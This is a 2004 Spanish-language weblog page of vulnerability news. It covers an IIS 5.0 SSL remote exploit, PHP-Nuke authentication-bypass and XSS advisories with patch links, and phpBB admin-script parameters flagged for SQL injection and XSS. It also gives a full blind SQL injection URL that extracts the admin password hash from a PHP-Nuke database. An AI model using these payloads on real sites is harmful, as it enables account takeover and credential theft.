|
Se muestran los artículos pertenecientes al tema Vulnerabilidades. 23/04/2004Exploit para IIS 5.0 (root remoto) "SSL Vulnerability - CAN-2004-0120" se ha publicado un expliot sobre esta vulnerabilidad que permite acceder remotamente como root en sistema con IIS 5.0. Descargar Exploit14/04/2004XSS & multiple SQL Injection en PHP-Nuke 6.x y 7.xSe han descubierto tres nuevas fallas en PHP-Nuke, la solucion y enlaces a los correspondientes advisories los he colocado aqui.[ Admin-level authentication bypass in phpnuke 6.x-7.2] Esta es la mas peligrosa para todas las web :S http://www.securityfocus.com/archive/1/360136 [ User-level authentication bypass in phpnuke 6.x-7.2 ] http://www.securityfocus.com/archive/1/360129 [ Cross-Site Scripting aka XSS in phpnuke 6.x-7.2 part 3 ] http://www.securityfocus.com/archive/1/360156 Parches: http://www.phpnuke.org/modules.php?name=News&file=article&sid=6679 Extraido de RZW 29/03/2004phpBB Multiple Input Validation VulnerabilitiesMultiples vulnerabilidades estas sacudiendo phpbb en estos ultimos dias, entre ellas, esta que permite realizar injection sqp y ataques XXS:Exploit admin_smilies.php?mode=edit&id=[SQL] admin_smilies.php?mode=delete&id=[SQL] admin_smilies.php?mode=edit&id=[XSS] admin_smilies.php?mode=delete&id=[XSS] admin_styles.php?mode=edit&style_id=[SQL] admin_styles.php?mode=delete&style_id=[SQL] admin_styles.php?mode=edit&style_id=[XSS] admin_styles.php?mode=delete&style_id=[XSS] Para mas Info: Securityfocus PHP-Nuke MS-Analysis Module HTTP Referrer Field SQL Injection VulnerabilityNuevo vulnerabilidades publicada en Secuityfocus sobre Phpnuke que permite injection sql.Exploit: "http://www.example.com/search?q=Maty+Scripts%27UNION SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1)/*" Para mas Info: Securityfocus |
xatyroBienvenido a mi WebLog espero que te agrade ;).
TemasArchivosEnlaces |
.